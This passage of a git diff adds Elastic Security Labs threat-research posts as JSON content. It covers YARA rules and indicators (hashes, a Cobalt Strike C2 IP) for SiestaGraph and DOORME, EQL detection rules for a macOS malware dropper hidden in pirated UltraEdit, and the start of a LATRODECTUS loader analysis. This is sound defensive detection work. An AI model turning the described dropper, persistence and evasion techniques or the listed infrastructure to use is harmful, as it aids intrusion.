= \"96b226e1dcfb8ea2155c2fa508125472c8c767569d009a881ab4c39453e4fe7f\"\n strings:\n $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 32 44 24 ?? 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 F8 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 E0 88 44 29 ?? 8B 74 24 ?? }\n $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? }\n $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? 
?? ?? 48 89 B4 24 ?? ?? ?? ?? 44 89 44 24 ?? 46 8D 04 28 41 81 C0 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 41 C1 C0 ?? 45 01 C8 44 89 C1 44 21 C9 44 89 C2 F7 D2 21 FA 48 89 BC 24 ?? ?? ?? ?? 8D 2C 1E 49 89 DC 01 D5 01 E9 81 C1 ?? ?? ?? ?? C1 C1 ?? 44 01 C1 89 CA 44 21 C2 89 CD F7 D5 44 21 CD 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 8D 1C 07 01 EB 01 DA 81 C2 ?? ?? ?? ?? C1 C2 ?? }\n $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F B6 04 19 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 E6 ?? 44 0F B6 04 1E BA ?? ?? ?? ?? 48 8B 4D ?? E8 ?? ?? ?? ?? 48 83 C7 ?? }\n $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ?? 08 C8 88 45 ?? 41 83 C4 ?? 31 F6 44 39 E6 7D ?? 66 90 }\n $str_0 = \".?AVDoorme@@\" ascii fullword\n condition:\n 3 of ($seq*) or 1 of ($str*)\n}\n\nrule Windows_Trojan_SiestaGraph {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-12-14\"\n last_modified = \"2022-12-15\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"SiestaGraph\"\n threat_name = \"Windows.Trojan.SiestaGraph\"\n reference_sample = \"50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54\"\n strings:\n $a1 = \"downloadAsync\" ascii nocase fullword\n $a2 = \"UploadxAsync\" ascii nocase fullword\n $a3 = \"GetAllDriveRootChildren\" ascii fullword\n $a4 = \"GetDriveRoot\" ascii fullword\n $a5 = \"sendsession\" wide fullword\n $b1 = \"ListDrives\" wide fullword\n $b2 = \"Del OK\" wide fullword\n $b3 = \"createEmailDraft\" ascii fullword\n $b4 = \"delMail\" ascii fullword\n condition:\n all of ($a*) and 2 of ($b*)\n}\n```\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. 
It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Reconnaissance](https://attack.mitre.org/tactics/TA0043/)\n- [Initial access](https://attack.mitre.org/tactics/TA0001)\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Persistence](https://attack.mitre.org/tactics/TA0003)\n- [Defense evasion](https://attack.mitre.org/tactics/TA0005)\n- [Credential access](https://attack.mitre.org/tactics/TA0006)\n- [Discovery](https://attack.mitre.org/tactics/TA0007)\n- [Lateral movement](https://attack.mitre.org/tactics/TA0008/)\n- [Collection](https://attack.mitre.org/tactics/TA0009)\n- [Command and control](https://attack.mitre.org/tactics/TA0011)\n\n### Techniques / Sub-techniques\n\nTechniques and sub-techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Gather host information](https://attack.mitre.org/techniques/T1592/)\n- [Gather victim information](https://attack.mitre.org/techniques/T1589/)\n- [Gather victim network information](https://attack.mitre.org/techniques/T1590/)\n- [Gather victim org information](https://attack.mitre.org/techniques/T1591/004/)\n- [Exploit public-facing application](https://attack.mitre.org/techniques/T1190/)\n- [Command and Scripting Interpreter: Windows command-shell](https://attack.mitre.org/techniques/T1059/003/)\n- [Command and Scripting Interpreter: Powershell](https://attack.mitre.org/techniques/T1059/001/)\n- [Network share discovery](https://attack.mitre.org/techniques/T1135/)\n- [Remote system discovery](https://attack.mitre.org/techniques/T1018/)\n- [File and directory discovery](https://attack.mitre.org/techniques/T1083/)\n- [Process discovery](https://attack.mitre.org/techniques/T1057/)\n- [Remote services: SMB/Windows admin shares](https://attack.mitre.org/techniques/T1021/002/)\n- [System service discovery](https://attack.mitre.org/techniques/T1007/)\n- [System owner/user discovery](https://attack.mitre.org/techniques/T1033/)\n- [Hijack execution flow: 
DLL side-loading](https://attack.mitre.org/techniques/T1574/002/)\n- [Masquerading: Masquerade task or service](https://attack.mitre.org/techniques/T1036/004/)\n- [Process injection](https://attack.mitre.org/techniques/T1055/)\n- [Indicator removal: File deletion](https://attack.mitre.org/techniques/T1070/004/)\n- [Deobfuscate/decode files or information](https://attack.mitre.org/techniques/T1140/)\n- [Virtualization/sandbox evasion: Time based Evasion](https://attack.mitre.org/techniques/T1497/003/)\n- [OS credential dumping: NTDS](https://attack.mitre.org/techniques/T1003/003/)\n- [OS credential dumping: Security Account Manager](https://attack.mitre.org/techniques/T1003/002/)\n- [OS credential dumping: DCSync](https://attack.mitre.org/techniques/T1003/006/)\n- [Create or modify system process: Windows service](https://attack.mitre.org/techniques/T1543/003/)\n- [Scheduled task/job: Scheduled task](https://attack.mitre.org/techniques/T1053/005/)\n- [Valid accounts](https://attack.mitre.org/techniques/T1078/)\n- [Server software component: IIS components](https://attack.mitre.org/techniques/T1505/004/)\n- [Server software component: Web shell](https://attack.mitre.org/techniques/T1505/003/)\n- [Email collection: Local email collection](https://attack.mitre.org/techniques/T1114/001/)\n- [Archive collected data: Archive via utility](https://attack.mitre.org/techniques/T1560/001/)\n- [Screen capture](https://attack.mitre.org/techniques/T1113/)\n- [Web service](https://attack.mitre.org/techniques/T1102/)\n- [Application layer protocol: Web protocols](https://attack.mitre.org/techniques/T1071/001/)\n\n## References\n\n- [https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme](https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme)\n- [https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks](https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks)\n- 
[https://threatfox.abuse.ch/ioc/1023850/](https://threatfox.abuse.ch/ioc/1023850/)\n- [https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper](https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper)\n- [https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell](https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell)\n- [https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx](https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx)\n\n## Observables\n\nAll observables are also available [for download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc0eb869ac242975f/637bf8b1fa033a109b5d94bd/ref4526-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Indicator | Type | Name | Reference |\n| ---------------------------------------------------------------- | ------- | --------------------------------------- | --------------------------------------------------------- |\n| 1a87e1b41341ad042711faa0c601e7b238a47fa647c325f66b1c8c7b313c8bdf | SHA-256 | OfficeClient.exe and OfficeCore.exe | SIESTAGRAPH |\n| 7fc54a287c08cde70fe860f7c65ff71ade24dfeedafdfea62a8a6ee57cc91950 | SHA-256 | Officeclient.exe | SIESTAGRAPH |\n| f9b2b3f7ee55014cc8ad696263b24a21ebd3a043ed1255ac4ab6a63ad4851094 | SHA-256 | officeup.exe | SIESTAGRAPH |\n| c283ceb230c6796d8c4d180d51f30e764ec82cfca0dfaa80ee17bb4fdf89c3e0 | SHA-256 | Microsoft.Exchange.Entities.Content.dll | DOORME |\n| 4b7d244883c762c52a0632b186562ece7324881a8e593418262243a5d86a274d | SHA-256 | iisrehv.dll | SessionManager |\n| 54f969ce5c4be11df293db600df57debcb0bf27ecad38ba60d0e44d4439c39b6 | SHA-256 | kk2.exe | mhyprot.sys loader |\n| 509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6 | SHA-256 | mhyprot.sys | vulnerable driver |\n| 386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd | SHA-256 | 13802 AR.exeBDReinit.exe | vulnerable Bitdefender 
Crash Handler |\n| 452b08d6d2aa673fb6ccc4af6cebdcb12b5df8722f4d70d1c3491479e7b39c05 | SHA-256 | log.dll | SHADOWPAD |\n| 5be0045a2c86c38714ada4084080210ced8bc5b6865aef1cca658b263ff696dc | SHA-256 | APerfectDayBase.dll | malicious DLL injected into vulnerable binaries |\n| 3f5377590689bd19c8dd0a9d46f30856c90d4ee1c03a68385973188b44cc9ab7 | SHA-256 | AlarmClock.exe | benign, but targeted for side-loading APerfectDayBase.dll |\n| f2a9ee6dd4d1ceb4d97138755c919549549311c06859f236fc8655cf38fe5653 | SHA-256 | Loader.any | currently unknown DLL |\n| 3b41c46824b78263d11b1c8d39cfe8c0e140f27c20612d954b133ffb110d206a | SHA-256 | Loader.any | currently unknown DLL |\n| 9b66cd1a80727882cfa1303ada37019086c882c9543b3f957ee3906440dc8276 | SHA-256 | Class1.exe | currently unknown file |\n| 185.239.70.229 | ipv4 | na | Cobalt Strike C2 |\n"
+ },
+ "title": "SiestaGraph: New implant uncovered in ASEAN member foreign ministry",
+ "slug": "siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry",
+ "subtitle": "Elastic Security Labs is tracking an active intrusion, by likely multiple threat actors, into the Foreign Affairs office of an ASEAN member.",
+ "date": "2022-12-16",
+ "description": "Elastic Security Labs is tracking likely multiple on-net threat actors leveraging Exchange exploits, web shells, and the newly discovered SiestaGraph implant to achieve and maintain access, escalate privilege, and exfiltrate targeted data.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ },
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "devon-kerr"
+ }
+ ],
+ "image": "photo-edited09.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "ref2924",
+ "siestagraph",
+ "doorme"
+ ]
+ },
+ "id": "security_labs_content-siestagraph_new_implant_uncovered_in_asean_member_foreign_ministry-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sinking_macos_pirate_ships-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sinking_macos_pirate_ships-md.json
new file mode 100644
index 00000000000..fddd9ced631
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sinking_macos_pirate_ships-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Sinking macOS Pirate Ships with Elastic Behavior Detections\"\nslug: \"sinking-macos-pirate-ships\"\ndate: \"2024-03-15\"\ndescription: \"This research looks at a recently found macOS malware campaign using the macOS Endpoint Security Framework paired with the Elastic Agent to hunt and detect the behaviors this malware exhibits.\"\nauthor:\n - slug: colson-wilhoit\nimage: \"photo-edited-01@2x.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - macOS\n---\n\n## Preamble\n\nOn January 12, 2024, Malwrhunterteam, an X account that surfaces interesting malware samples, usually found via VirusTotal, released a [Tweet](https://twitter.com/malwrhunterteam/status/1745959438140297697) about a pirated macOS application that appeared to contain malicious capabilities. macOS security researcher Patrick Wardle quickly released a [write-up](https://objective-see.org/blog/blog_0x79.html) detailing the application’s malicious functionality, which included dropping second and third-stage payloads. Shortly after, the team at JAMF Threat Labs released a [blog](https://jamf.com/blog/jtl-malware-pirated-applications/) that captured several additional sibling samples that JAMF had been tracking before the Malwrhunterteam tweet, delving deep into the internals and core functionality this malware provides. If you have not read both of these great write-ups, there are a lot of helpful details and background information in these sources that will add context to the rest of this analysis.\n\nThis publication will not cover the malware internals or related samples. Instead, we will look to provide practical, resilient detection and threat hunting guidance that can enable you to alert on the actions taken by this, or similarly related, malware. 
Signature-based detections commonly fall short of such capabilities; however, we will highlight how our behavior rules deal with this.\n\nWe will be breaking down the malware's actions in each stage and analyzing how we can use the data from the macOS [Endpoint Security Framework (ESF)](https://developer.apple.com/documentation/endpointsecurity) and the Elastic Agent to build these detections. Let's dig in.\n\n\n\n\n## UltraEdit\n\nThe [UltraEdit](https://www.ultraedit.com/) application (a legitimate text and hex editor) was pirated (altered and then abused to facilitate malware distribution) along with several other applications and distributed via a disk image file (`.dmg`). \n\nUpon executing the pirated version of the application, it immediately loads a 3rd party, _unsigned_ dylib (macOS shared library) called `libConfigurer64.dylib`. This dylib acts as a dropper whose goal is to download and execute follow-on payloads. The dylib downloads and executes two hidden files: `/private/tmp/.test` and `/Users/Shared/.fseventsd`. \n\nLooking at the initial actions taken by the application, we can see the unsigned 3rd party dylib load takes place immediately post-execution in the Analyzer View of the Elastic Security Solution. This is an important event to focus on because it is the only non-system library loaded. \n\n\n\n\nIn version 8.11, Elastic Defend introduced a first-of-its-kind dylib load event for the macOS Elastic Agent, allowing us to capture library loads and details regarding those libraries, such as dylib signature data. With this powerful new visibility, we can quickly build an [Event Query Language (EQL)](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql.html) query that looks for unsigned dylib loads from a volume mount or the applications directory structure. 
\n\n**Rule Name: Application Unsigned Dylib Load**\n```\nlibrary where event.action == \"load\" and dll.path : \n(\"/Volumes/*.app/Contents/*\", \"/Applications/*.app/Contents/*\") \nand dll.code_signature.exists == false\n```\n\n\n\n\nWe can and should take this a step further to identify only untrusted or unsigned processes that are loading an unsigned library. This will reduce the number of false positives and still accurately capture the event taking place.\n\n**Rule Name: Unsigned or Untrusted Application Unsigned Dylib Load**\n```\nlibrary where event.action == \"load\" and \n(process.code_signature.exists == false or process.code_signature.trusted == false) \nand dll.path : (\"/Volumes/*.app/Contents/*\", \"/Applications/*.app/Contents/*\") and \ndll.code_signature.exists == false\n```\n\nWe now have a behavior-based detection that triggers on the unsigned process that loads the unsigned dylib and alerts us to its presence. \n\nLet’s look at the additional payloads and their actions to see if we can build any additional detections.\n\n### .test\n\nThe `.test` binary gets placed in the temporary directory post-download (`/private/tmp/.test`) and executed with process arguments containing a path to an SSH binary. As noted by JAMF Threat Labs, this SSH path is not the default location of the SSH binary on macOS, which actually resides at `/usr/bin/ssh`. 
This command line does not correspond to any intended functionality, but is rather an attempt to blend in.\n\nAs Patrick Wardle and JAMF stated, this binary is a macOS build of the open source, cross-platform post-exploitation agent known as [Khepri](https://github.com/geemion/Khepri) and provides full backdoor access to a target system.\n\n\n\n\nFrom a detection perspective, we could create a very specific query here that looks for hidden binaries (files prefixed with a period are hidden from the user’s view in the GUI and CLI) executing from suspicious locations with process arguments containing the path to the SSH binary. \n\nThe issue with creating a query like this is that, as JAMF pointed out:\n\n> one particularly interesting technique that the malware uses is replacing its command-line arguments to further blend in with the operating system.\n\nThe malware updates these process arguments between samples, so while this query might detect one of the samples, they could easily change it and bypass this detection. \n\nInstead of the process arguments, we could focus on the unsigned, hidden binary executing from a suspicious directory like `/tmp`. \n\n**Rule Name: Untrusted or Unsigned Hidden Binary Executed from Temporary Directory**\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and \nprocess.executable : (\"/private/tmp/*\", \"/tmp/*\") and \nprocess.name : \".*\" and (process.code_signature.exists == false or \nprocess.code_signature.trusted == false)\n```\n\nWith the above rule, if any hidden unsigned or untrusted binaries attempt to execute from a temporary directory, we will be alerted irrespective of whether our signatures or our machine learning models detect it. \n\n\n\n\n(A note on false positives: though it should be extremely rare, you will occasionally see hidden binaries executing from a temporary directory on macOS, as some macOS developers adopt poor software development practices. 
False positives should be reviewed case-by-case and only excluded via the rule or Elastic exclusion list if the software is business-approved and validated.)\n\nIn addition to this rule, since the hidden payloads make outbound command and control network connections, we could also look for any outbound network connections from a hidden executable, as that is very suspicious activity on macOS and should at least warrant an alert. If you want to reduce the possibility of false positives, scope the rule to specific process executable directories like `/Users/Shared/` or `/tmp/`, or include process code signature data specifying unsigned or untrusted hidden executables. \n\n**Rule Name: Hidden Executable Outbound Network Connection**\n\n```\nnetwork where event.type == \"start\" and \nevent.action == \"connection_attempted\" and process.name : \".*\"\n```\n\nSince this is a backdoor payload that offers a variety of functionality (upload, download, etc.), it would be prudent to create additional rules that look for some of these actions from an unsigned or untrusted, hidden binary. Since we already have a rule that would detect the hidden binary's initial execution, we will move on to the next payload.\n\n### .fseventsd\n\n`.fseventsd` was the second payload dropped by the malicious dylib at `/Users/Shared/.fseventsd`. This payload’s purpose was to provide a persistent foothold on the victim’s machine utilizing a masqueraded launch agent and to act as a downloader for another payload that has yet to be found. Still, we know from reverse engineering of `.fseventsd` that this missing payload is named `.fseventsds`.\n\nWe can see via the Elastic Analyzer View that the first notable event is the persistence installation of a masqueraded launch agent. \n\n\n\n\nThis activity can be tackled from two different angles. We could first detect this by looking for the masqueraded `.plist` file utilizing file events and process code signature data. 
In the below behavior rule, we look for files where the file name starts with `com.apple…`, the file path is in a `Library/LaunchAgents` or `Library/LaunchDaemons` directory, and the responsible process is unsigned or untrusted. \n\n**Rule Name: Persistence via a Masqueraded Plist Filename**\n\n```\nfile where event.type != \"deletion\" and \n file.name : \"*com.apple*.plist\" and\n file.path :\n (\"/System/Library/LaunchAgents/*\", \n \"/Library/LaunchAgents/*\",\n \"/Users/*/Library/LaunchAgents/*\",\n \"/System/Library/LaunchDaemons/*\",\n \"/Library/LaunchDaemons/*\") and\n(process.code_signature.trusted == false or \nprocess.code_signature.exists == false)\n```\n\n\n\n\nThe second way we can detect this persistent install technique is to take advantage of another new data source unique to Elastic Agent, which my colleague Ricardo Ungureanu and I added to version 8.6 of Elastic Defend. We created an aptly named persistence event that monitors the launch services directories and collects the plist details, sending them back in a structured event that can be used to create rules around suspicious or malicious Launch Agents or Daemons. \n\nIn the following rule, we look for launch events where the `runatload` value is set to `true` or the `keepalive` value is set to `true`, and the plist arguments contain the path to a hidden executable in the `/Users/Shared` directory. This rule could be expanded to include additional suspicious or malicious arguments that would alert you to the installation of persistence by a malicious or suspicious binary. 
\n\n**Rule Name: Persistence via Suspicious Launch Agent or Launch Daemon**\n\n```\nfile where event.action == \"launch_daemon\" and \n(Persistence.runatload == true or Persistence.keepalive == true) and \n Persistence.args : \"/Users/Shared/.*\"\n```\n\n\n\n\nThe masqueraded plist could also be detected with this persistence event using the below query.\n\n```\nfile where event.action == \"launch_daemon\" and \nPersistence.name : \"com.apple.*\" and \n(process.code_signature.exists == false or \nprocess.code_signature.trusted == false)\n```\n\nThe final piece here is the downloading of the missing 3rd stage payload. The hidden `.fseventsd` located in the `/Users/Shared` folder reaches out to download this new hidden payload to the `/tmp/` directory. You might remember we already created two rules (“Untrusted or Unsigned Hidden Binary Executed from Temporary Directory” and “Hidden Executable Outbound Network Connection”) that would detect this activity. \n\nWe could add another rule to catch when a hidden executable is created in a suspicious directory. We can look for any file event where the event action is not the deletion of the file, the file name denotes a hidden file, the file contains Mach-O header bytes, and the file path is one where the execution of a hidden file is not common. We collect file header bytes if the file is an executable, allowing us to distinguish executable files from other file types without relying solely on the file extension.\n\n**Rule Name: Hidden Executable Created in Unusual Directory**\n\n```\nfile where event.action != \"deletion\" and file.name : \".*\" and \nfile.Ext.header_bytes : (\"cffaedfe*\", \"cafebabe*\") and \nfile.path : (\"/Users/Shared/*\", \"/private/tmp/*\", \"/tmp/*\")\n```\n\n\n\n\n## Summary\n\nThis malware is representative of many campaigns targeting macOS today. 
Our report on the DPRK malware KANDYKORN shows that these campaigns are modular, encompassing multiple stages of payloads with capabilities and functionality distributed between these payloads to avoid detection. You can see that with UltraEdit, one payload serves as the interactive backdoor and the other as the persistence mechanism. Malware like this can often easily update to avoid signatures. Still, as we have shown, behavior rules are far harder to avoid and allow us to bridge the gap between static signatures and machine learning models. \n\nBehavior-based rules are very powerful if you have the right data and the ability to correlate that data. Our endpoint behavior rules can detect and prevent malware regardless of whether it updates. We have over 200 endpoint behavior rules on macOS alone, including versions of those shown in this publication, that allow us to detect and prevent previously “undetected” malware by observing its actions in real time. If you want to check out our production endpoint behavior rules, they can be found [here](https://github.com/elastic/protections-artifacts). To learn more about our query languages, you can look here ([EQL](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql.html) and [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-getting-started.html)). We are proud to be an open source company and want to let our software and features speak for themselves. If you want to test and explore these features for yourself, you can easily create an [Elastic Cloud](https://www.elastic.co/cloud) account with a 30-day trial license, or for local testing, you can download “[The Elastic Container Project](https://github.com/peasead/elastic-container)” and set the license value to trial in the `.env` file. 
\n\n## References\n\n* [https://twitter.com/malwrhunterteam/status/1745959438140297697](https://twitter.com/malwrhunterteam/status/1745959438140297697)\n* [https://objective-see.org/blog/blog_0x79.html](https://objective-see.org/blog/blog_0x79.html)\n* [https://jamf.com/blog/jtl-malware-pirated-applications](https://jamf.com/blog/jtl-malware-pirated-applications/)\n* [https://developer.apple.com/documentation/endpointsecurity](https://developer.apple.com/documentation/endpointsecurity) "
+ },
+ "title": "Sinking macOS Pirate Ships with Elastic Behavior Detections",
+ "slug": "sinking-macos-pirate-ships",
+ "date": "2024-03-15",
+ "description": "This research looks at a recently found macOS malware campaign using the macOS Endpoint Security Framework paired with the Elastic Agent to hunt and detect the behaviors this malware exhibits.",
+ "author": [
+ {
+ "slug": "colson-wilhoit"
+ }
+ ],
+ "image": "photo-edited-01@2x.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "macOS"
+ ]
+ },
+ "id": "security_labs_content-sinking_macos_pirate_ships-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sneak_peek_elastic_2022_global_threat_report-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sneak_peek_elastic_2022_global_threat_report-md.json
new file mode 100644
index 00000000000..c36e66a06d0
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-sneak_peek_elastic_2022_global_threat_report-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Sneak Peek: Elastic’s 2022 Global Threat Report\"\nslug: \"sneak-peek-elastic-2022-global-threat-report\"\ndate: \"2022-11-30\"\ndescription: \"Elastic Security Labs has compiled the 2022 Global Threat Report to share trends and tactics adversaries and attack groups use, as observed by our threat research team and broader user community over the past year.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"blog-open-security-720x420-B.jpg\"\ncategory:\n - slug: reports\n---\n\nThe [Elastic Security Labs](http://www.elastic.co/security-labs) team is passionate about securing the world’s data from attack, and strives to raise the bar within the security industry. To this end, Elastic Security Labs has compiled the [2022 Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) to share trends and tactics adversaries and attack groups use, as observed by our threat research team and broader user community over the past year.\n\nLet’s dig into a few of the endpoint related findings:\n\n1. 72% of all defense evasion techniques consisted of masquerading and system binary proxy execution\n\n2. ~77% of all credential access techniques are attributed to OS credential dumping with commonly known utilities\n\nHere’s a chart on how the endpoint techniques breakdown across our data set.\n\n\n\nThis was just a preview of the research coming your way. We have lots of findings and recommendations coming your way soon. Stay tuned to [Elastic Security Labs](http://www.elastic.co/security-labs) for the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report).\n"
+ },
+ "title": "Sneak Peek: Elastic’s 2022 Global Threat Report",
+ "slug": "sneak-peek-elastic-2022-global-threat-report",
+ "date": "2022-11-30",
+ "description": "Elastic Security Labs has compiled the 2022 Global Threat Report to share trends and tactics adversaries and attack groups use, as observed by our threat research team and broader user community over the past year.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "blog-open-security-720x420-B.jpg",
+ "category": [
+ {
+ "slug": "reports"
+ }
+ ]
+ },
+ "id": "security_labs_content-sneak_peek_elastic_2022_global_threat_report-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-spring_cleaning_with_latrodectus-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-spring_cleaning_with_latrodectus-md.json
new file mode 100644
index 00000000000..ad397fb6cc3
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-spring_cleaning_with_latrodectus-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID\"\nslug: \"spring-cleaning-with-latrodectus\"\ndate: \"2024-05-16\"\nsubtitle: \"The LATRODECTUS loader evolves to deliver ICEDID and other malware\"\ndescription: \"Elastic Security Labs has observed an uptick in a recent emerging loader known as LATRODECTUS. This lightweight loader packs a big punch with ties to ICEDID and may turn into a possible replacement to fill the gap in the loader market.\"\nauthor:\n - slug: daniel-stepanic\n - slug: samir-bousseaden\nimage: \"Security Labs Images 16.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - icedid\n - latrodectus\n - loader\n---\n\n## LATRODECTUS at a glance\n\nFirst [discovered](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39) by Walmart researchers in October of 2023, [LATRODECTUS](https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111) is a malware loader gaining popularity among cybercriminals. While this is considered a new family, there is a strong link between LATRODECTUS and [ICEDID](https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary) due to behavioral and developmental similarities, including a command handler that downloads and executes encrypted payloads like ICEDID. Proofpoint and Team Cymru built upon this connection to discover a [strong link](https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice) between the network infrastructure used by both the operators of ICEDID and LATRODECTUS.\n\nLATRODECTUS offers a comprehensive range of standard capabilities that threat actors can utilize to deploy further payloads, conducting various activities after initial compromise. The code base isn’t obfuscated and contains only 11 command handlers focused on enumeration and execution. 
This type of loader represents a recent wave observed by our team, exemplified by [PIKABOT](https://www.elastic.co/security-labs/pikabot-i-choose-you), where the code is more lightweight and direct, with a limited number of handlers. \n\nThis article will focus on LATRODECTUS itself, analyzing its most significant features and sharing resources for addressing this financially impactful threat.\n\n### Key takeaways\n\n - Initially discovered by Walmart researchers last year, LATRODECTUS continues to gain adoption among recent financially-motivated campaigns\n - LATRODECTUS, a possible replacement for ICEDID, shares similarities with ICEDID, including a command handler to execute ICEDID payloads\n - We observed new event handlers (process discovery, desktop file listing) since its inception and the integration of a self-delete technique to delete running files\n - Elastic Security provides a high degree of capability through memory signatures, behavioral rules, and hunting opportunities to respond to threats like LATRODECTUS\n\n### LATRODECTUS campaign overview\n\nBeginning early March of 2024, Elastic Security Labs observed an increase in email campaigns delivering LATRODECTUS. 
These campaigns typically involve a recognizable infection chain built on oversized JavaScript files that utilize WMI’s ability to invoke msiexec.exe and install an MSI file hosted remotely on a WebDAV share.\n\n\n\nWith major changes in the loader space during the past year, such as the [QBOT](https://www.elastic.co/security-labs/qbot-malware-analysis) takedown and [ICEDID](https://www.elastic.co/security-labs/unpacking-icedid) dropping off, we are seeing new loaders such as [PIKABOT](https://www.elastic.co/security-labs/pikabot-i-choose-you) and [LATRODECTUS](https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111) emerge as possible replacements.\n\n## LATRODECTUS analysis\n\nOur LATRODECTUS [sample](https://www.virustotal.com/gui/file/aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c/details) comes initially packed with file information [masquerading](https://attack.mitre.org/techniques/T1036/) as a component of Bitdefender’s kernel-mode driver (TRUFOS.SYS), shown in the following image.\n\n\n\n\nIn order to move forward with malware analysis, the sample must be unpacked manually or via an automatic unpacking service such as [UnpacMe](http://Unpac.Me).\n\n\n\n\nLATRODECTUS is a DLL with 4 different exports, and each export is assigned the same export address.\n\n\n\n\n### String obfuscation \n\nAll of the strings within LATRODECTUS are protected using a straightforward algorithm that transforms the encrypted bytes with arithmetic and bitwise operations. The initial [report](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39) published in 2023 detailed a PRNG algorithm that was not observed in our sample, suggesting continuous development of this loader. 
